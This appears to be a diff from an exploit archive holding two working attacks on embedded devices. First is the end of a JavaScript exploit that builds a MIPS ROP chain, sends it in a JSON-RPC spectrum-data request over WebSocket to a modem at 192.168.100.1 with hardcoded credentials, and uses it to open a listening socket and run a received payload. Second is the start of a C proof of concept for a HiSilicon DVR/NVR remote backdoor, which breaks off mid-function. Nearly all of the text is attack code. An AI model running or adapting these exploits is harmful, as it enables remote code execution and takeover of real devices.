insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])
//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
//0x80a05a30;
serverAddr = [0xe2, 0x80, 0xa0, 0x5a, 0x30];
previousSp = sp
sp = previousSp+0x20
insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp + 0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x48, 0x71, 0x6c])
//0x8048716c: move $a0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp + 0x10
insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x87, 0x9e, 0x68])
//0x80879e68: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp + 0x10
insertAt(arr, previousSp-1, [0xe2, 0x80, 0x83, 0xd9, 0xb8])
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18])
//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44])
//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call memset
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp, [0x41, 0x2, 0x5, 0x39]) //set s0 = port
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
// previousSp = sp
// sp = previousSp+0x10
// insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
// //0x80787f64: jalr $s5; nop;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, sp-1, socketAddr)
insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])
//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
//store port
// previousSp = sp
// sp = previousSp+0x20
// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
// //0x80787f64: jalr $s5; nop;
socketAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x1c]
previousSp = sp
sp = previousSp+0x20
insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp+0x4-1, serverAddr) //set s1 = server
insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8])
//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp + 0x10
insertAt(arr, previousSp-1, [0xe2, 0x80, 0x8a, 0x62, 0x4c])
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18])
//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44])
//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call bind
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54])
//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x91, 0x20]) //set s0 = listen - 0x
insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])
//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;
previousSp = sp
sp = previousSp+0x30
insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call listen
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x8, 0x40, 0x8])
//0x80084008: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xe2, 0x80, 0x8a, 0xd8, 0x84]) //set s0 = accept
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x14, 0x27, 0x10])
//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call accept
//0x80a05b24
clientAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x24]
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, clientAddr) //set s0 = clientAddr
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])
//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
// previousSp = sp
// sp = previousSp+0x20
// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
// //0x80787f64: jalr $s5; nop;
clientAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x20]
previousSp = sp
sp = previousSp+0x20
insertAt(arr, sp-1, clientAddrM4) //set s0 = clientAddr - 4
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x4c, 0x10, 0x38])
//0x804c1038: addiu $a2, $zero, 0x400; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//0x80a05c30
payloadAddr = [0xe2, 0x80, 0xa0, 0x5c, 0x30]
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp+0x4-1, payloadAddr) //set s1 = payload
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8])
//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x46, 0x73, 0x68])
//0x80467368: move $a3, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x93, 0x3c]) //set s0 = recv - 0x
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])
//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;
previousSp = sp
sp = previousSp+0x30
insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call recv
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x4-1, [0xf2, 0x80, 0x80, 0xa8, 0x64])
// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;
previousSp = sp
sp = previousSp+0x20
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x12, 0x3b, 0x7c])
//0x80123b7c: addiu $a0, $a0, 4; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0xab, 0x5c]) //set s0 = sleep
insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call sleep
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, payloadAddr) //set s0 = payload
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
var string = new TextDecoder("utf-8").decode(arr);
var newArr = new TextEncoder("utf-8").encode(string);
console.log(buf2hex(newArr));
exploit = '{"jsonrpc":"2.0","method":"Frontend::GetFrontendSpectrumData","params":{"coreID":0,"fStartHz":' + string + ',"fStopHz":1000000000,"fftSize":1024,"gain":1},"id":"0"}'
console.log(exploit)
console.log(testEqual(arr, newArr));
var socket = new WebSocket("ws://spectrum:spectrum@192.168.100.1:6080/Frontend", 'rpc-frontend')
socket.onopen = function(e) {
socket.send(exploit)
fetch('/payload')
};

458
exploits/hardware/remote/48004.c Normal file
View file

@ -0,0 +1,458 @@
# Exploit Title: HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account
# Dork: N/A
# Date: 2020-02-03
# Exploit Author: Snawoot
# Vendor Homepage: http://www.hisilicon.com
# Product Link: http://www.hisilicon.com/en/Products
# Version: hi3520d
# Tested on: Linux
# CVE: N/A
# References: https://habr.com/en/post/486856/
# References: https://github.com/Snawoot/hisilicon-dvr-telnet
# References: https://github.com/tothi/pwn-hisilicon-dvr#summary
# POC:
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
typedef unsigned char byte;
typedef unsigned int uint;
byte state[2048] = {0};
byte datum[] = {
0x20, 0x01, 0x02, 0x03, 0x04, 0x05, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09,
0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11,
0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19,
0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x01,
0x0e, 0x04, 0x0d, 0x01, 0x02, 0x0f, 0x0b, 0x08, 0x03, 0x0a, 0x06, 0x0c,
0x05, 0x09, 0x00, 0x07, 0x00, 0x0f, 0x07, 0x04, 0x0e, 0x02, 0x0d, 0x01,
0x0a, 0x06, 0x0c, 0x0b, 0x09, 0x05, 0x03, 0x08, 0x04, 0x01, 0x0e, 0x08,
0x0d, 0x06, 0x02, 0x0b, 0x0f, 0x0c, 0x09, 0x07, 0x03, 0x0a, 0x05, 0x00,
0x0f, 0x0c, 0x08, 0x02, 0x04, 0x09, 0x01, 0x07, 0x05, 0x0b, 0x03, 0x0e,
0x0a, 0x00, 0x06, 0x0d, 0x0f, 0x01, 0x08, 0x0e, 0x06, 0x0b, 0x03, 0x04,
0x09, 0x07, 0x02, 0x0d, 0x0c, 0x00, 0x05, 0x0a, 0x03, 0x0d, 0x04, 0x07,
0x0f, 0x02, 0x08, 0x0e, 0x0c, 0x00, 0x01, 0x0a, 0x06, 0x09, 0x0b, 0x05,
0x00, 0x0e, 0x07, 0x0b, 0x0a, 0x04, 0x0d, 0x01, 0x05, 0x08, 0x0c, 0x06,
0x09, 0x03, 0x02, 0x0f, 0x0d, 0x08, 0x0a, 0x01, 0x03, 0x0f, 0x04, 0x02,
0x0b, 0x06, 0x07, 0x0c, 0x00, 0x05, 0x0e, 0x09, 0x0a, 0x00, 0x09, 0x0e,
0x06, 0x03, 0x0f, 0x05, 0x01, 0x0d, 0x0c, 0x07, 0x0b, 0x04, 0x02, 0x08,
0x0d, 0x07, 0x00, 0x09, 0x03, 0x04, 0x06, 0x0a, 0x02, 0x08, 0x05, 0x0e,
0x0c, 0x0b, 0x0f, 0x01, 0x0d, 0x06, 0x04, 0x09, 0x08, 0x0f, 0x03, 0x00,
0x0b, 0x01, 0x02, 0x0c, 0x05, 0x0a, 0x0e, 0x07, 0x01, 0x0a, 0x0d, 0x00,
0x06, 0x09, 0x08, 0x07, 0x04, 0x0f, 0x0e, 0x03, 0x0b, 0x05, 0x02, 0x0c,
0x07, 0x0d, 0x0e, 0x03, 0x00, 0x06, 0x09, 0x0a, 0x01, 0x02, 0x08, 0x05,
0x0b, 0x0c, 0x04, 0x0f, 0x0d, 0x08, 0x0b, 0x05, 0x06, 0x0f, 0x00, 0x03,
0x04, 0x07, 0x02, 0x0c, 0x01, 0x0a, 0x0e, 0x09, 0x0a, 0x06, 0x09, 0x00,
0x0c, 0x0b, 0x07, 0x0d, 0x0f, 0x01, 0x03, 0x0e, 0x05, 0x02, 0x08, 0x04,
0x03, 0x0f, 0x00, 0x06, 0x0a, 0x01, 0x0d, 0x08, 0x09, 0x04, 0x05, 0x0b,
0x0c, 0x07, 0x02, 0x0e, 0x02, 0x0c, 0x04, 0x01, 0x07, 0x0a, 0x0b, 0x06,
0x08, 0x05, 0x03, 0x0f, 0x0d, 0x00, 0x0e, 0x09, 0x0e, 0x0b, 0x02, 0x0c,
0x04, 0x07, 0x0d, 0x01, 0x05, 0x00, 0x0f, 0x0a, 0x03, 0x09, 0x08, 0x06,
0x04, 0x02, 0x01, 0x0b, 0x0a, 0x0d, 0x07, 0x08, 0x0f, 0x09, 0x0c, 0x05,
0x06, 0x03, 0x00, 0x0e, 0x0b, 0x08, 0x0c, 0x07, 0x01, 0x0e, 0x02, 0x0d,
0x06, 0x0f, 0x00, 0x09, 0x0a, 0x04, 0x05, 0x03, 0x0c, 0x01, 0x0a, 0x0f,
0x09, 0x02, 0x06, 0x08, 0x00, 0x0d, 0x03, 0x04, 0x0e, 0x07, 0x05, 0x0b,
0x0a, 0x0f, 0x04, 0x02, 0x07, 0x0c, 0x09, 0x05, 0x06, 0x01, 0x0d, 0x0e,
0x00, 0x0b, 0x03, 0x08, 0x09, 0x0e, 0x0f, 0x05, 0x02, 0x08, 0x0c, 0x03,
0x07, 0x00, 0x04, 0x0a, 0x01, 0x0d, 0x0b, 0x06, 0x04, 0x03, 0x02, 0x0c,
0x09, 0x05, 0x0f, 0x0a, 0x0b, 0x0e, 0x01, 0x07, 0x06, 0x00, 0x08, 0x0d,
0x04, 0x0b, 0x02, 0x0e, 0x0f, 0x00, 0x08, 0x0d, 0x03, 0x0c, 0x09, 0x07,
0x05, 0x0a, 0x06, 0x01, 0x0d, 0x00, 0x0b, 0x07, 0x04, 0x09, 0x01, 0x0a,
0x0e, 0x03, 0x05, 0x0c, 0x02, 0x0f, 0x08, 0x06, 0x01, 0x04, 0x0b, 0x0d,
0x0c, 0x03, 0x07, 0x0e, 0x0a, 0x0f, 0x06, 0x08, 0x00, 0x05, 0x09, 0x02,
0x06, 0x0b, 0x0d, 0x08, 0x01, 0x04, 0x0a, 0x07, 0x09, 0x05, 0x00, 0x0f,
0x0e, 0x02, 0x03, 0x0c, 0x0d, 0x02, 0x08, 0x04, 0x06, 0x0f, 0x0b, 0x01,
0x0a, 0x09, 0x03, 0x0e, 0x05, 0x00, 0x0c, 0x07, 0x01, 0x0f, 0x0d, 0x08,
0x0a, 0x03, 0x07, 0x04, 0x0c, 0x05, 0x06, 0x0b, 0x00, 0x0e, 0x09, 0x02,
0x07, 0x0b, 0x04, 0x01, 0x09, 0x0c, 0x0e, 0x02, 0x00, 0x06, 0x0a, 0x0d,
0x0f, 0x03, 0x05, 0x08, 0x02, 0x01, 0x0e, 0x07, 0x04, 0x0a, 0x08, 0x0d,
0x0f, 0x0c, 0x09, 0x00, 0x03, 0x05, 0x06, 0x0b, 0x10, 0x07, 0x14, 0x15,
0x1d, 0x0c, 0x1c, 0x11, 0x01, 0x0f, 0x17, 0x1a, 0x05, 0x12, 0x1f, 0x0a,
0x02, 0x08, 0x18, 0x0e, 0x20, 0x1b, 0x03, 0x09, 0x13, 0x0d, 0x1e, 0x06,
0x16, 0x0b, 0x04, 0x19, 0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02,
0x3c, 0x34, 0x2c, 0x24, 0x1c, 0x14, 0x0c, 0x04, 0x3e, 0x36, 0x2e, 0x26,
0x1e, 0x16, 0x0e, 0x06, 0x40, 0x38, 0x30, 0x28, 0x20, 0x18, 0x10, 0x08,
0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01, 0x3b, 0x33, 0x2b, 0x23,
0x1b, 0x13, 0x0b, 0x03, 0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05,
0x3f, 0x37, 0x2f, 0x27, 0x1f, 0x17, 0x0f, 0x07, 0xf4, 0x63, 0x01, 0x00,
0x28, 0x08, 0x30, 0x10, 0x38, 0x18, 0x40, 0x20, 0x27, 0x07, 0x2f, 0x0f,
0x37, 0x17, 0x3f, 0x1f, 0x26, 0x06, 0x2e, 0x0e, 0x36, 0x16, 0x3e, 0x1e,
0x25, 0x05, 0x2d, 0x0d, 0x35, 0x15, 0x3d, 0x1d, 0x24, 0x04, 0x2c, 0x0c,
0x34, 0x14, 0x3c, 0x1c, 0x23, 0x03, 0x2b, 0x0b, 0x33, 0x13, 0x3b, 0x1b,
0x22, 0x02, 0x2a, 0x0a, 0x32, 0x12, 0x3a, 0x1a, 0x21, 0x01, 0x29, 0x09,
0x31, 0x11, 0x39, 0x19, 0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01,
0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02, 0x3b, 0x33, 0x2b, 0x23,
0x1b, 0x13, 0x0b, 0x03, 0x3c, 0x34, 0x2c, 0x24, 0x3f, 0x37, 0x2f, 0x27,
0x1f, 0x17, 0x0f, 0x07, 0x3e, 0x36, 0x2e, 0x26, 0x1e, 0x16, 0x0e, 0x06,
0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05, 0x1c, 0x14, 0x0c, 0x04,
0x50, 0x64, 0x01, 0x00, 0x01, 0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,
0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x01, 0x0e, 0x11, 0x0b, 0x18,
0x01, 0x05, 0x03, 0x1c, 0x0f, 0x06, 0x15, 0x0a, 0x17, 0x13, 0x0c, 0x04,
0x1a, 0x08, 0x10, 0x07, 0x1b, 0x14, 0x0d, 0x02, 0x29, 0x34, 0x1f, 0x25,
0x2f, 0x37, 0x1e, 0x28, 0x33, 0x2d, 0x21, 0x30, 0x2c, 0x31, 0x27, 0x38,
0x22, 0x35, 0x2e, 0x2a, 0x32, 0x24, 0x1d, 0x20
};
void init_cipher_offset_vector(byte *dst,byte *src,int size)
{
int i;
i = 0;
while (i < size) {
dst[i] = (byte)((int)(uint)src[i >> 3] >> (i & 7U)) & 1;
i = i + 1;
}
return;
}
void apply_cipher_offset_vector(byte *dst,byte *src,byte *offset_vector,size_t size)
{
int i;
i = 0;
while (i < (int)size) {
state[i] = src[(uint)offset_vector[i] - 1];
i = i + 1;
}
memcpy(dst,state,size);
return;
}
void cipher_memcpy_shuffle(void *dst,size_t size)
{
memcpy(state,dst,size);
memcpy(dst,(void *)(dst + size),0x1c - size);
memcpy((void *)(dst + (0x1c - size)),state,size);
return;
}
void init_cipher_state(void *dst,void *src)
{
byte current_byte;
int i;
